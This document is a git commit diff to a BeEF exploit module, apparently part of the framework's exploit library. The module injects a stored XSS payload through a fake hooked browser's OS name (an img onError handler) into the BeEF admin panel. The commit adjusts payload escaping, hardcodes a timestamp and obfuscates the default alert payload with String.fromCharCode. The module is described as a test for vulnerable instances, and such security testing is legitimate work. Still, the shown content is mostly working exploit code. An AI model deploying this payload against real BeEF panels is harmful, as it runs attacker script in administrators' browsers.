eliminate escaping issues

2026-01-21 15:32:44 +10:00
parent 2080cf5b0d
commit 6409891724
3 changed files with 7 additions and 6 deletions
--- a/modules/exploits/beef_admin_panel_xss/command.js
+++ b/modules/exploits/beef_admin_panel_xss/command.js
@@ -6,8 +6,8 @@

 beef.execute(function() {

-  var target_beef_url = "<%= @target_beef_url %>";
-  var xss_payload = "<%= @xss_payload %>";
+  var target_beef_url = "<%= @target_beef_url.to_s.gsub('"', '\\"') %>";
+  var xss_payload = "<%= @xss_payload.to_s.gsub('\\', '\\\\\\\\').gsub('"', '\\"').gsub("'", "\\\\'") %>";

  // Generate a random session ID (80 characters, uppercase + digits)
  function generateHookId() {
@@ -41,7 +41,8 @@ beef.execute(function() {
  var HOOK = generateHookId();

  // Build the malicious payload - XSS is injected into host.os.name
-  var malicious_os_name = 'Linux<img src=x onError=' + xss_payload + '>';
+  // Note: the payload is wrapped in the img onerror handler
+  var malicious_os_name = "Linux<img src=x onError=" + xss_payload + ">";

  var browser_data = [{
    "cid": 0,
@@ -62,7 +63,7 @@ beef.execute(function() {
      "browser.window.referrer": "http://exploited-host:8000/victim.html",
      "browser.window.size.width": 1678,
      "browser.window.size.height": 168,
-      "browser.date.datestamp": new Date().toString(),
+      "browser.date.datestamp": "Fri Jan 16 2026 23:34:24 GMT+1000 (Australian Eastern Standard Time)",
      "host.os.name": malicious_os_name,
      "host.os.family": "Linux",
      "host.os.arch": 64,
--- a/modules/exploits/beef_admin_panel_xss/config.yaml
+++ b/modules/exploits/beef_admin_panel_xss/config.yaml
@@ -10,6 +10,6 @@ beef:
            category: "Exploits"
            name: "BeEF Admin Panel XSS"
            description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.<br/><br/>This can be used to test if a target BeEF instance is running a vulnerable version."
-            authors: ["radsec"]
+            authors: ["author"]
            target:
                working: ["ALL"]
--- a/modules/exploits/beef_admin_panel_xss/module.rb
+++ b/modules/exploits/beef_admin_panel_xss/module.rb
@@ -7,7 +7,7 @@ class Beef_admin_panel_xss < BeEF::Core::Command
  def self.options
    [
      { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' },
-      { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' }
+      { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert(String.fromCharCode(88,83,83))", 'width' => '400px' }
    ]
  end